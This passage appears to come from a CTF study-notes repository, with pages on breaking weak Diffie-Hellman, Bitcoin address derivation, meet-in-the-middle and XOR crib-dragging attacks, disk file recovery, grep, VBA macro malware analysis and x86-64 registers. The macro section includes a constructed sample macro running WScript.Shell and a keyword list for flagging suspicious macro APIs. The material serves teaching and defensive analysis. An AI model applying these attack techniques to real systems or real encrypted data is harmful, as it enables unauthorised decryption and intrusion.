modulus `p`, which is normally `p-1`. 
But if this `p-1` value can be **factored into small primes**, this greatly reduces the strength and makes it vulnerable to the Pohlig–Hellman algorithm (see [#g-only-has-small-factors](diffie-hellman.md#g-only-has-small-factors "mention")). If it helps, read [this answer](https://crypto.stackexchange.com/questions/87137/how-to-get-the-order-of-a-group-generator-in-dh/87138#87138) to understand how $$G$$ is calculated in Diffie-Hellman. 43 | 44 | After breaking the logic and finding a private key, you can often just calculate the shared secret yourself and use it to decrypt whatever messages were encrypted. 45 | 46 | ### Computing manually 47 | 48 | A simple approach to solving the Discrete Logarithm is a **meet-in-the-middle** algorithm that tries to compute the private key `a` from the known public key `A`, `g` and `p`. A requirement for this algorithm is that the group order $$G$$ explained above is **small**. 49 | 50 | [`sage`](https://github.com/sagemath) is a useful tool in mathematics that has many features and built-in algorithms. One of these is the [`discrete_log`](https://doc.sagemath.org/html/en/reference/groups/sage/groups/generic.html#sage.groups.generic.discrete_log) function, which has several common algorithms implemented and chooses between them automatically. When dealing with Diffie-Hellman and non-standard generation of `p`, it's a good idea to try throwing it into this function to find out if it is easily breakable: 51 | 52 | ```python 53 | R = IntegerModRing(p) # Handle modular arithmetic 54 | a = discrete_log(R(A), R(g)) # Compute a (Alice) from A and g mod p 55 | b = discrete_log(R(B), R(g)) # Compute b (Bob) from B and g mod p 56 | ``` 57 | 58 | ### G only has small factors 59 | 60 | Normally, the group order $$G$$ has a large prime factor keeping it safe, but if this is not the case (e.g. 
created from many small primes), the [Pohlig–Hellman algorithm](https://en.wikipedia.org/wiki/Pohlig%E2%80%93Hellman_algorithm) can be used to efficiently perform the Discrete Logarithm. The `discrete_log()` function from sage will also try this method **automatically** if it finds the group order is composite instead of prime, so the same method as above can be used. 61 | 62 | For a simple explanation of the idea behind this attack, [read this example](https://github.com/zelinsky/CTF-Course/blob/master/Classes/16.md#example). 63 | -------------------------------------------------------------------------------- /cryptography/blockchain/README.md: -------------------------------------------------------------------------------- 1 | # Blockchain 2 | 3 | -------------------------------------------------------------------------------- /cryptography/blockchain/bitcoin-addresses.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: A bit of information about Bitcoin addresses 3 | --- 4 | 5 | # Bitcoin addresses 6 | 7 | Addresses (public keys) are generated from the private key using Elliptic Curve Cryptography and are often displayed in Base58 (Base64 with a few confusing characters removed like `0OIl`). 8 | 9 | You can simulate this behavior if you have a private key for example, but no public key. 
In this case, simply pass the private key through the normal generating function; here is an example in Python ([source](https://bitcoin.stackexchange.com/a/96191)): 10 | 11 | ```python 12 | import ecdsa 13 | import hashlib 14 | import base58 15 | 16 | private_key = "5JYJWrRd7sbqEzL9KR9dYTGrxyLqZEhPtnCtcvhC5t8ZvWgS9iC" 17 | 18 | # WIF to private key by https://en.bitcoin.it/wiki/Wallet_import_format 19 | private_key_bytes = base58.b58decode_check(private_key)[1:] 20 | 21 | # Private key to public key (ecdsa transformation) 22 | signing_key = ecdsa.SigningKey.from_string(private_key_bytes, curve=ecdsa.SECP256k1) 23 | verifying_key = signing_key.get_verifying_key() 24 | public_key = b"\x04" + verifying_key.to_string() 25 | 26 | # SHA-256 of the public key 27 | sha256_1 = hashlib.sha256(public_key) 28 | 29 | # RIPEMD-160 of the SHA-256 of the public key 30 | ripemd160 = hashlib.new("ripemd160") 31 | ripemd160.update(sha256_1.digest()) 32 | 33 | # checksum 34 | hashed_public_key = b"\x00" + ripemd160.digest() 35 | checksum_full = hashlib.sha256(hashlib.sha256(hashed_public_key).digest()).digest() 36 | checksum = checksum_full[:4] 37 | bin_addr = hashed_public_key + checksum 38 | 39 | # encode address to base58 and print 40 | address = base58.b58encode(bin_addr) 41 | print(f"{address=}") # b'1AsSgrcaWWTdmJBufJiGWB87dmwUf2PLMZ' 42 | ``` 43 | 44 | {% hint style="info" %} 45 | You may have a hex-encoded version of the key. In this case, simply decode the key from hex instead of Base58, and you should have the `private_key_bytes` again 46 | {% endhint %} 47 | -------------------------------------------------------------------------------- /cryptography/custom-ciphers/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | "Never roll your own crypto" is a saying for a reason. 
It's hard to make a 4 | secure cryptographic algorithm because there are many ways it may be broken 5 | --- 6 | 7 | # Custom Ciphers 8 | 9 | ## General Ideas 10 | 11 | The first thing you should look at with a custom cipher is what randomness it relies on. You should look at **how many possible keys** there are to brute-force. Sometimes only ASCII values are allowed in the key, meaning you don't have to brute-force all 256 bytes, but only the 32-127 bytes. 12 | 13 | Also think about if it's possible to brute-force some parts **separately**, instead of all at once. Sometimes you can know when a certain byte in the key is correct, meaning you can brute-force all the bytes one by one. 14 | 15 | This is the basis of finding vulnerabilities in custom ciphers. It's all about thinking about how you could brute-force the key and tricks to do it more efficiently. 16 | 17 | In a challenge meant to be solved, it is often fast enough to use a simple language like Python. But it creates lots of overhead and implementations of brute-force in languages like C or Rust will often be way faster. 18 | 19 | ### Meet in the Middle 20 | 21 | There is a great [YouTube video](https://www.youtube.com/watch?v=wL3uWO-KLUE) by _polylog_ explaining this technique to solve Rubik's Cubes as an example. 22 | 23 |
Figure: A visual example of using the Meet in the Middle attack for Rubik's Cubes (from the video)
24 | 25 | The goal of a cryptographic algorithm is that it's really hard to brute-force. Sometimes this is done by repeating tasks to make it exponentially harder. 26 | 27 | Take **DES**, for example, an old encryption standard with a **56-bit** key. Nowadays cracking a 56-bit key is doable on a very powerful computer. We could naively just come up with "**Double DES**", which would just be 2 DES encryptions with 2 different keys. That means you would need 2x56-bit keys, meaning 112 bits. This is absolutely not brute-forcible and you might think it is secure. 28 | 29 | When you only have a ciphertext and you don't know what plaintext it will turn into, you cannot break it as you would indeed need to brute-force all 112 bits at the same time, maybe until some meaningful text comes out. You would need about 5e+33 operations to go through all the keys. 30 | 31 | But in the case where you have a **plaintext-ciphertext pair**, you can do a lot better. This is because you don't need to start at the ciphertext and brute-force all the way to the plaintext. Instead, you can start brute-force _decrypting_ from the ciphertext **halfway** to the plaintext, and then also brute-force _encrypting_ from the plaintext halfway to the ciphertext. If you store all the middle values from encrypting the plaintext, you can try to find a match when decrypting the ciphertext. A match here means the first 56-bit key is the one found from the plaintext side, and the second key is the one found from the ciphertext side. This is known as the **Meet in the Middle** attack. 32 | 33 | You could use this to halve the exponent of something that gets exponentially harder. In the Double DES example above, it would result in brute-forcing two 56-bit keys separately, instead of one 112-bit key. The only catch here is the fact that you would have to store all the halfway points and their keys, meaning it could take up quite a bit of **memory**. But this is often very worth it as the amount of computation is greatly reduced. 
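As an added example (not code from the original page), the attack above carried out in Python against a constructed toy Feistel block cipher with a 16-bit key that stands in for DES: the "Double" version has a 32-bit key, yet both halves are recovered with about 2·2^16 block operations and a 2^16-entry table instead of 2^32 trials. The cipher, the key values and the plaintexts are all constructed for this demonstration.

```python
import hashlib
import struct
from typing import Dict, List, Optional, Tuple

# Toy 64-bit Feistel block cipher with a 16-bit key (constructed for this
# example, standing in for DES; not a real cipher, only used to show the attack).
ROUNDS = 4
KEY_BITS = 16
KEY_SPACE = 1 << KEY_BITS
MASK32 = 0xFFFFFFFF


def _round_function(key: int, half: int, rnd: int) -> int:
    """Keyed round function: first 4 bytes of SHA-256(key || half || round)."""
    data = struct.pack(">HIB", key, half, rnd)
    return int.from_bytes(hashlib.sha256(data).digest()[:4], "big")


def encrypt_block(key: int, block: int) -> int:
    left, right = block >> 32, block & MASK32
    for rnd in range(ROUNDS):
        left, right = right, left ^ _round_function(key, right, rnd)
    return (left << 32) | right


def decrypt_block(key: int, block: int) -> int:
    left, right = block >> 32, block & MASK32
    for rnd in reversed(range(ROUNDS)):
        # Undo one Feistel round: the previous right half is the current left half.
        left, right = right ^ _round_function(key, left, rnd), left
    return (left << 32) | right


def double_encrypt(k1: int, k2: int, block: int) -> int:
    """'Double' version: two encryptions under two independent keys (32 key bits)."""
    return encrypt_block(k2, encrypt_block(k1, block))


def meet_in_the_middle(pairs: List[Tuple[int, int]]) -> Optional[Tuple[int, int]]:
    """Recover (k1, k2) from known plaintext/ciphertext pairs.

    Phase 1: encrypt the first plaintext under every k1 and store
             halfway value -> k1 in a table (2^16 entries: the memory cost).
    Phase 2: decrypt the first ciphertext under every k2 and look the
             halfway value up.  A hit gives a candidate pair, which the
             remaining pairs confirm (a random 64-bit collision is unlikely
             at this size, but always verify before trusting a match).
    Total work is about 2 * 2^16 block operations instead of 2^32.
    """
    p0, c0 = pairs[0]
    halfway: Dict[int, int] = {}
    for k1 in range(KEY_SPACE):
        halfway[encrypt_block(k1, p0)] = k1
    for k2 in range(KEY_SPACE):
        k1 = halfway.get(decrypt_block(k2, c0))
        if k1 is None:
            continue
        if all(double_encrypt(k1, k2, p) == c for p, c in pairs[1:]):
            return k1, k2
    return None


def demo() -> Optional[Tuple[int, int]]:
    """Constructed scenario: secret keys and two known plaintext/ciphertext pairs."""
    secret_k1, secret_k2 = 0x1A2B, 0x3C4D                   # constructed, unknown to the attacker
    plaintexts = [0x48656C6C6F2C2044, 0x6F75626C65204445]  # "Hello, D" and "ouble DE"
    pairs = [(p, double_encrypt(secret_k1, secret_k2, p)) for p in plaintexts]
    return meet_in_the_middle(pairs)


if __name__ == "__main__":
    print("naive work: 2^%d, meet-in-the-middle work: ~2^%d" % (2 * KEY_BITS, KEY_BITS + 1))
    print("recovered keys:", demo())
```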
34 | 35 | {% hint style="info" %} 36 | **Note**: Often you'll see in real challenges that the key has some restrictions which make it weaker than completely random bits to brute-force. These attacks rely on half of the exponent being brute-forceable, which isn't the case with large-key cryptographic algorithms like AES. 37 | {% endhint %} 38 | 39 | For an example of this attack in practice, you can see this writeup: 40 | 41 | {% embed url="https://jorianwoltjer.com/blog/post/ctf/cyber-santa-is-coming-to-town-2021/meet-me-halfway" %} 42 | Challenge with two weak AES keys to brute-force separately using Meet in the Middle 43 | {% endembed %} 44 | 45 | The basic idea of the attack is first brute-forcing one key, then saving all the halfway points together with the key they came from, then brute-forcing the second key and checking when a halfway point matches one from the first key. Then you have both parts of the key. 46 | -------------------------------------------------------------------------------- /cryptography/xor.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: An operation between bits used often in cryptography 3 | --- 4 | 5 | # XOR 6 | 7 | ## Description 8 | 9 | Understanding XOR is very important in cryptography because a lot of encryption algorithms use it in some way. XOR stands for eXclusive OR, meaning it's the OR operation except that 1 XOR 1 is 0 instead of 1. You can see a truth table below: 10 | 11 |
| XOR | 0 | 1 |
| --- | --- | --- |
| 0 | 0 | 1 |
| 1 | 1 | 0 |
12 | 13 | This means that only if the two values are different, the XOR function will return 1. It also means that if one value is 1, the result will be the inverse of the other value. So XORing with 1 is basically flipping a bit. 14 | 15 | Often you're working with long strings of bytes that are XORed, but this works the same way, just doing XOR for every bit: 16 | 17 | ```python 18 | 01000010 01111001 01100101 = "Hey" # Plaintext 19 | 01001011 01000101 01011001 = "KEY" # Key 20 | -------------------------- XOR 21 | 00001001 00111100 00111100 = "\t<<" # Ciphertext 22 | ``` 23 | 24 | The nice thing about XOR is also the fact that encryption and decryption are the exact same operation because you're just flipping the bits where the key is 1. When decrypting you're just flipping the bits back: 25 | 26 | ```python 27 | 00001001 00111100 00111100 = "\t<<" # Ciphertext 28 | 01001011 01000101 01011001 = "KEY" # Key 29 | -------------------------- XOR 30 | 01000010 01111001 01100101 = "Hey" # Plaintext 31 | ``` 32 | 33 | But this also means that if you know the ciphertext, and the plaintext you can XOR them both to get the key: 34 | 35 | ```python 36 | 00001001 00111100 00111100 = "\t<<" # Ciphertext 37 | 01000010 01111001 01100101 = "Hey" # Plaintext 38 | -------------------------- XOR 39 | 01001011 01000101 01011001 = "KEY" # Key 40 | ``` 41 | 42 | Since XOR encryption works bit-by-bit you don't even need to know the whole plaintext to get part of the key. If you know only the first few characters of the plaintext, or in some special positions you can still get the key at those same positions. 43 | 44 | ## Repeating-key XOR 45 | 46 | Repeating-key XOR is when a key for XOR is shorter than the plaintext/ciphertext and needs to be repeated to fill the space. 47 | 48 | ``` 49 | Plaintext: Hello, world! And some more text. 
50 | Key: secretsecretsecretsecretsecretsec 51 | ``` 52 | 53 | Using some analytical techniques it's possible to abuse this fact to brute-force the key byte-by-byte by looking at what the plaintext would be after decrypting. You can filter out any non-printable characters for example to narrow down a lot of results, and there are lots of techniques for finding how normal a text looks. As you can imagine this works better for longer plaintexts, because the key will be repeated more times. 54 | 55 | There is a useful tool that finds the key length, and brute-forces it automatically: 56 | 57 | {% embed url="https://github.com/hellman/xortool" %} 58 | A tool to analyze and brute-force XOR repeating-key encryption 59 | {% endembed %} 60 | 61 | {% code title="Examples" %} 62 | ```shell 63 | xortool file.bin # Find lengths 64 | xortool -l 11 -c 20 file.bin # Length 11 + character \x20 (space) most common 65 | xortool -x -c ' ' file.hex # File is hex encoded + space character most common 66 | xortool -b -f message.enc # Brute-force with output filter (charset) 67 | xortool -b -p "CTF{" message.enc # Brute-force with known plaintext 68 | ``` 69 | {% endcode %} 70 | 71 | ## Multi-Time Pad (Crib Dragging) 72 | 73 | The [One-Time Pad](https://en.wikipedia.org/wiki/One-time\_pad) (OTP) is a well-known **unbreakable** cipher. The important thing though is _One-Time_, and when the key is used multiple times instead, it becomes insecure very quickly. 74 | 75 | [This answer](https://crypto.stackexchange.com/a/33694) explains the idea behind the "Many-Time Pad" attack. The main takeaway is that if you guess one character at a position correctly, you can get back the key at that index, and reuse that for other ciphertexts to make better guesses. 76 | 77 | A simple but useful tool here is the one linked below. You provide two ciphertexts and can guess common strings like " `the` " or "`. The` " or others if you know part of the plaintext. 
The tool will show what the other plaintext must be at all positions. Try to find a plausible text here, and click Output 1/2 to save it there and continue: 78 | 79 | {% embed url="https://toolbox.lotusfa.com/crib_drag/" %} 80 | Try "Crib words" to guess plaintext possibilities and find positions 81 | {% endembed %} 82 | 83 | After finding a chunk of plaintext, a useful **interactive tool** is [MTP](https://github.com/CameronLonsdale/MTP) by _CameronLonsdale_. It allows you to write letters in all plaintext guesses at the same time to see if anything makes sense: 84 | 85 |
Figure: Interactively guess letters to expand the plaintext all the way
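Added example (not part of the original page or of the tools linked above) covering both the "plaintext XOR ciphertext gives the key" observation from the Description and the crib dragging described in this section. Two constructed messages are XORed with the same constructed 24-byte key; because `c1 ^ c2 == p1 ^ p2`, a crib like `" the "` is slid along that XOR and every offset where the other message decodes to printable text is reported. A confirmed hit yields the key bytes at that offset, which decrypt the same offset of any further ciphertext under that key.

```python
import string
from typing import List, Tuple

# Bytes considered plausible plaintext: printable ASCII plus space, no control characters.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings; the result is as long as the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def crib_drag(c1: bytes, c2: bytes, crib: bytes) -> List[Tuple[int, bytes]]:
    """Slide a plaintext guess (crib) along c1 ^ c2 == p1 ^ p2.

    If the crib really sits in one message at offset i, XORing it into p1 ^ p2
    at that offset reveals the other message's bytes there.  Offsets whose
    result is not printable text are discarded as implausible.
    """
    xored = xor_bytes(c1, c2)  # the shared key cancels out completely
    hits = []
    for i in range(len(xored) - len(crib) + 1):
        fragment = xor_bytes(xored[i:i + len(crib)], crib)
        if all(b in PRINTABLE for b in fragment):
            hits.append((i, fragment))
    return hits


def key_from_known_plaintext(ciphertext: bytes, plaintext: bytes, offset: int) -> bytes:
    """Known plaintext at an offset gives the key bytes at that offset: k = c ^ p."""
    return xor_bytes(ciphertext[offset:offset + len(plaintext)], plaintext)


def decrypt_at(ciphertext: bytes, key_fragment: bytes, offset: int) -> bytes:
    """Reuse recovered key bytes against another message encrypted with the same key."""
    return xor_bytes(ciphertext[offset:offset + len(key_fragment)], key_fragment)


# --- constructed scenario: one key reused for three messages -----------------
KEY = bytes.fromhex("9f3a7c1e55d0b2c4e7a91b6d3f08c2a5d64e0b7f2c9a1d83")  # constructed
P1 = b"meet me at the old mill"
P2 = b"bring the key with you."
P3 = b"nobody knows the secret"
C1, C2, C3 = (xor_bytes(p, KEY) for p in (P1, P2, P3))


def demo() -> Tuple[List[Tuple[int, bytes]], bytes, bytes]:
    """Drag the crib, confirm one hit, recover key bytes, reuse them on a third message."""
    hits = crib_drag(C1, C2, b" the ")
    # The hit at offset 10 reads "key w" for the other message, which is plausible
    # English, so the analyst accepts it: P2[10:15] == b"key w" is now known plaintext.
    key_fragment = key_from_known_plaintext(C2, b"key w", 10)
    # The same key bytes decrypt offset 10..14 of a third message under the same key.
    return hits, key_fragment, decrypt_at(C3, key_fragment, 10)


if __name__ == "__main__":
    hits, key_fragment, p3_fragment = demo()
    for offset, fragment in hits:
        print(f"offset {offset:2d}: other message reads {fragment!r}")
    print("recovered key bytes:", key_fragment.hex(), "-> third message:", p3_fragment)
```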
86 | -------------------------------------------------------------------------------- /forensics/file-recovery.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Recovering content of deleted files 3 | --- 4 | 5 | # File Recovery 6 | 7 | Find disks using `mount` and look for `sd[a-z]`: 8 | 9 |
```shell-session
$ mount
/dev/sdb on / type ext4 (rw,relatime,discard,errors=remount-ro,data=ordered)
...
```
13 | 14 | Then grep for any known text: 15 | 16 | ```shell-session 17 | $ sudo grep -a -C 200 -F 'Insert text here' /dev/sdb | tee /tmp/recovered 18 | ``` 19 | 20 | This will output a lot of garbage as well, so you can then filter on ASCII lines only: 21 | 22 | ```shell-session 23 | $ grep --color=never -aoP '^[[:ascii:]]*$' /tmp/recovered 24 | ``` 25 | -------------------------------------------------------------------------------- /forensics/grep.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Search for text inside of files 3 | --- 4 | 5 | # Grep 6 | 7 | ## Description 8 | 9 | Grep is a really useful tool for quickly finding what you're looking for. If you know a file somewhere has some content, or just want to find all files with a certain pattern in them, Grep is the perfect tool for the job. It's written in C and highly optimized, meaning you can quickly search through lots of files. 10 | 11 | ```shell-session 12 | $ grep [OPTIONS...] PATTERNS [FILES...] 13 | ``` 14 | 15 | * `OPTIONS` can be any flags to change the way the search works, or how matches are displayed 16 | * `PATTERNS` is a string containing one or more patterns to search for, separated by newline characters (`\n`). To put a newline character in an argument you can use the `$'first\nsecond'` syntax 17 | * `FILES` are the files to search through for the `PATTERNS`. If not specified, it will read from standard input (piping into grep). In recursive mode with `-r`, it defaults to the current directory but can be any directory 18 | 19 |
```shell-session
$ grep something file.txt
And here is something.
```
22 | 23 | {% hint style="info" %} 24 | See all documentation about the options with `man grep` 25 | {% endhint %} 26 | 27 | ### Options 28 | 29 | There are a few common and really useful options to know in Grep: 30 | 31 | * `-r`: **R**ecursively search a directory (default: current) 32 | * `-v`: In**v**ert search, matching lines that do not match the pattern 33 | * `-i`: Search case-**i**nsensitive (uppercase/lowercase doesn't matter) 34 | * `-n`: Print the line **n**umber of the match in the file 35 | * `-o`: **O**nly output match (no text around) 36 | * `-a`: Treat binary files **a**s text, so matches in them are shown too 37 | * `-b`: Show **b**yte-offset of matches 38 | * `-l`: **L**ist files that match instead of showing the match 39 | * Simple [regular-expressions-regex.md](../languages/regular-expressions-regex.md "mention") are enabled by default in `PATTERNS` 40 | * `-F`: Treat `PATTERNS` as **f**ixed strings, not regular expressions 41 | * `-P`: Use **p**erl-compatible regular expressions (PCRE) including all advanced RegEx features 42 | 43 | Some options are also available by using `egrep` (`-E`), `fgrep` (`-F`) and `rgrep` (`-r`) to quickly set the options without having to add the flag. 
44 | 45 | {% code title="Examples" %} 46 | ```shell-session 47 | # # Select files and output 48 | $ grep -r "something" # Search recursively in current directory for "something" 49 | $ grep -v "something" file.txt # Find all lines in file that don't match "something" 50 | $ grep "something" *.txt # Search "something" in all .txt files (current directory only) 51 | $ grep -r "something" --include "*.txt" # Recursively search "something" in .txt files 52 | $ grep -ab "something" file.bin # Show all (binary) matches and byte-offset 53 | $ grep -r -l "something" # List filenames that match "something" recursively 54 | $ grep -B2 -A5 "something" file.txt # Show 2 lines before, and 5 lines after match 55 | 56 | # # Patterns 57 | $ grep -r -i "something" # Search case-insensitively for "something" 58 | $ grep "CTF{.*}" file.txt # Search for flag format in file 59 | $ grep -P "\x73\x6f\x6d\x65\x74\x68\x69\x6e\x67" file.txt # Search for hex bytes in file 60 | $ xxd -p file.txt | grep "aabbccdd" # Search for hex bytes using xxd 61 | $ grep $'first\nsecond' file.txt # Search for multiple patterns in one file 62 | ``` 63 | {% endcode %} 64 | 65 | {% hint style="info" %} 66 | **Tip**: Also check out [`ripgrep`](https://github.com/BurntSushi/ripgrep) for a Rust implementation of most `grep` features, with better defaults for recursive searching while skipping unnecessary files 67 | {% endhint %} 68 | -------------------------------------------------------------------------------- /forensics/vba-macros.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Visual Basic for Applications is a programming language used to create macro 4 | scripts for Microsoft office apps 5 | --- 6 | 7 | # VBA Macros 8 | 9 | VBA Macros are often used for malware as they provide an easy way to execute code by only opening a seemingly harmless Word/Excel document. 
Not all documents are macro-enabled, only the following are ([source](https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions)):

* `.docm`: Word macro-enabled document
* `.dotm`: Word macro-enabled template
* `.xlm`: Legacy Excel macro
* `.xlsm`: Excel macro-enabled workbook
* `.xltm`: Excel macro-enabled template
* `.xla`: Excel add-in that can contain macros
* `.xlam`: Excel macro-enabled add-in
* `.ppam`: PowerPoint 2007 add-in with macros enabled
* `.pptm`: PowerPoint macro-enabled presentation
* `.potm`: PowerPoint macro-enabled template
* `.ppsm`: PowerPoint macro-enabled slideshow
* `.sldm`: PowerPoint macro-enabled slide

## OleVBA

[OleVBA](https://github.com/decalage2/oletools/wiki/olevba) is a tool to detect and analyze VBA Macros. It can find suspicious pieces of code and decode strings to allow you to reverse engineer what the code is doing.

You can get the source code of a macro-enabled document using the following command:

```shell-session
$ olevba document.docm
```

This will output a few different things. It will show the VBA code of all the macro files inside, and an analysis of suspicious strings and things like `AutoExec` that can activate macros when you open the document. This source code is what you'll most likely want to be looking at, but often it is very obfuscated as malware detection is getting better and better.

### Deobfuscating

The `--reveal` option can decode a few encodings to make the code more readable in some cases:

```shell-session
$ olevba invitation.docm --reveal > reveal.txt                      # Decode using olevba
$ sed -i -E "s/b'([^'\\\\]*(\\\\.[^'\\\\]*)*)'/\1/g" reveal.txt  # Replace b'' strings in output
```

For the rest, it's mostly a process of putting the code in a file and analyzing it by hand with a nice code editor.

{% hint style="info" %}
**Tip:** Use the [XVBA VSCode extension](https://marketplace.visualstudio.com/items?itemName=local-smart.excel-live-server) to easily navigate and highlight the code
{% endhint %}

A few pieces of syntax you'll likely come across are the following:

* `Sub main() ... End Sub`: This is a Subroutine, basically a function that is meant to be run by the user. Often these kinds of functions are what trigger the rest, so this is a good place to start
* `Function do_something(arg1 As String) As String ... End Function`: Obviously, this is a function, but it's also important to notice the `As String` types. These show the type of the argument and the return type of the function. A value is returned from a function by assigning to a variable with the same name as the function, so this function would **return** using `do_something = ...` in the function body.
* `Dim some_var As String`: Define a variable with a type

### Dynamic analysis

It might be quite some work to manually evaluate the code in your head while reading it, so another option is to just run some smaller pieces of code while logging various outputs. This can save a lot of time, for example when some larger malicious code is built from string operations. It would be really easy to just run the code that builds the malicious code and then analyze that further.

You can make a simple macro to run by opening a blank document in **Word**, going to the **Developer** tab (if you don't see this [try enabling it here](https://support.microsoft.com/en-us/office/show-the-developer-tab-in-word-e356706f-1891-4bb8-8d72-f57a51146792)), and choosing **Visual Basic**. From there you can **Insert** -> **Module** and a window should pop up for you to write code in. You should start with a `Sub` where you can write your code, and when you want to try running the code press the green ![](<../.gitbook/assets/image (13) (1).png>) button or just press F5.

Here's a simple example that should pop up some text:

```vba
Sub main()
    MsgBox "Hello, world!"
End Sub
```

Often you'll want to use this to see the return values of functions, so one simple way is to just call a function and save the result to a file, as VBA does not have a simple console to log things in. The code would look something like this:

```vba
Sub main()
    Dim result As String
    result = mystery()
    Open "result.txt" For Output As #1
    Print #1, result
    Close #1
End Sub

Function mystery() As String
    mystery = "this is returned"
End Function
```

When saving a file like this, you need to have saved the document you're working on somewhere. Then all paths in the macros will be relative to that saved file, so you should find `result.txt` next to the saved document.

When saving the file you need to explicitly say it is a document with macros enabled, or else it won't save the macros with the document. Do this simply by selecting **Word Macro-Enabled Document (\*.docm)** in **Save as type**.

Afterward, you should be able to quickly run your macro with F5 and check the output in `result.txt`.
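The post-processing that the `sed` one-liner in the Deobfuscating section does, written out in Python as an added example (this is not code from the page or from oletools). It finds the `b'...'` literals that `--reveal` leaves in the output and decodes them with `ast.literal_eval`, so escape sequences such as `\x48` become real characters instead of staying as text; it then folds adjacent `"a" & "b"` concatenations and scans the result for auto-exec names and APIs of the kind olevba flags. The sample VBA text, the keyword list and all function names are constructed for this example.

```python
import ast
import re

# Constructed sample modelled on `olevba --reveal` output, where decoded strings
# appear as Python bytes literals (b'...'). The VBA itself is made up for this example.
SAMPLE_REVEAL = r"""
Sub AutoOpen()
    Dim cmd As String
    cmd = b'po' & b'wer' & b'shell'
    payload = b'\x48\x65\x6c\x6c\x6f'
    CreateObject("WScript.Shell").Run cmd
End Sub
"""

# Same pattern as the sed one-liner: a b'...' literal whose body may contain
# backslash-escaped characters. The whole match is a valid Python bytes literal.
BYTES_LITERAL = re.compile(r"b'([^'\\]*(?:\\.[^'\\]*)*)'")

# Adjacent string literals joined with VBA's & operator.
CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')

# Auto-exec entry points and APIs worth a closer look; an assumed list for the
# example, not olevba's own table.
SUSPICIOUS = ["AutoOpen", "Document_Open", "AutoExec", "Workbook_Open",
              "CreateObject", "WScript.Shell", "Shell", "powershell"]


def decode_bytes_literals(text: str) -> str:
    """Replace every b'...' literal with its decoded content as a VBA string literal."""
    def repl(m: re.Match) -> str:
        raw = ast.literal_eval(m.group(0))          # bytes, escapes resolved
        # VBA escapes a double quote inside a string by doubling it
        return '"' + raw.decode("latin-1").replace('"', '""') + '"'
    return BYTES_LITERAL.sub(repl, text)


def fold_concatenations(text: str) -> str:
    """Merge "a" & "b" into "ab" repeatedly until nothing changes."""
    while True:
        new = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
        if new == text:
            return new
        text = new


def find_suspicious(text: str) -> dict[str, int]:
    """Return {keyword: line number of first occurrence} for keywords present (case-insensitive)."""
    hits: dict[str, int] = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for kw in SUSPICIOUS:
            if kw not in hits and kw.lower() in line.lower():
                hits[kw] = lineno
    return hits


def analyze(reveal_output: str) -> tuple[str, dict[str, int]]:
    """Decode, fold, and scan one olevba --reveal output; returns (cleaned code, hits)."""
    cleaned = fold_concatenations(decode_bytes_literals(reveal_output))
    return cleaned, find_suspicious(cleaned)


if __name__ == "__main__":
    code, hits = analyze(SAMPLE_REVEAL)
    print(code)
    for kw, line in sorted(hits.items(), key=lambda kv: kv[1]):
        print(f"line {line}: {kw}")
```

Running the scan after decoding matters: in the raw output the string `"powershell"` does not exist anywhere, so a keyword search over the undecoded text would miss it, while after `decode_bytes_literals` and `fold_concatenations` line 4 reads `cmd = "powershell"`.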

--------------------------------------------------------------------------------
/languages/assembly.md:
--------------------------------------------------------------------------------
---
description: A few cheatsheet-like things about the Assembly language
---

# Assembly

## Registers

Generally, `r`-prefixed registers are 64-bit, `e`-prefixed registers are 32-bit, non-prefixed registers are 16-bit, and `l`-suffixed registers are 8-bit. For `r8`-`r15` see the special cases below ([source](https://stackoverflow.com/a/20637866/10508498)):

| 64-bit register | Lower 32 bits | Lower 16 bits | Lower 8 bits |
| --------------- | ------------- | ------------- | ------------ |
| rax | eax | ax | al |
| rbx | ebx | bx | bl |
| rcx | ecx | cx | cl |
| rdx | edx | dx | dl |
| rsi | esi | si | sil |
| rdi | edi | di | dil |
| rbp | ebp | bp | bpl |
| rsp | esp | sp | spl |
| r8 | r8d | r8w | r8b (r8l) |
| r9 | r9d | r9w | r9b (r9l) |
| r10 | r10d | r10w | r10b (r10l) |
| r11 | r11d | r11w | r11b (r11l) |
| r12 | r12d | r12w | r12b (r12l) |
| r13 | r13d | r13w | r13b (r13l) |
| r14 | r14d | r14w | r14b (r14l) |
| r15 | r15d | r15w | r15b (r15l) |
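The naming rules above turned into code, as an added example that is not part of the page: `subregisters` derives the 32/16/8-bit alias names from a 64-bit register name (including the `r8`-`r15` special case), and `Register` models what writing through each alias does to the full register. The aliasing behaviour it models is the x86-64 rule that a write to a 32-bit alias zero-extends into the upper half, while 16-bit and 8-bit writes leave the other bits untouched; the class and function names are this example's own.

```python
# Register naming and aliasing on x86-64 (added example, not from the page).

LEGACY = {"rax": "a", "rbx": "b", "rcx": "c", "rdx": "d"}   # rXx -> eXx, Xx, Xl
POINTER_INDEX = ("rsi", "rdi", "rbp", "rsp")                 # rXX -> eXX, XX, XXl
MASK64 = (1 << 64) - 1


def subregisters(reg64: str) -> tuple[str, str, str]:
    """Return the (32-bit, 16-bit, 8-bit) alias names of a 64-bit register."""
    if reg64 in LEGACY:
        x = LEGACY[reg64]
        return f"e{x}x", f"{x}x", f"{x}l"
    if reg64 in POINTER_INDEX:
        base = reg64[1:]                               # "si", "di", "bp", "sp"
        return f"e{base}", base, f"{base}l"
    if reg64.startswith("r") and reg64[1:].isdigit() and 8 <= int(reg64[1:]) <= 15:
        return f"{reg64}d", f"{reg64}w", f"{reg64}b"   # r8b is also written r8l
    raise ValueError(f"unknown 64-bit register {reg64!r}")


class Register:
    """A 64-bit register that can be read and written through its partial aliases."""

    def __init__(self, name: str, value: int = 0):
        self.name = name
        self.aliases = dict(zip((64, 32, 16, 8), (name,) + subregisters(name)))
        self.value = value & MASK64

    def width_of(self, alias: str) -> int:
        for width, n in self.aliases.items():
            if n == alias:
                return width
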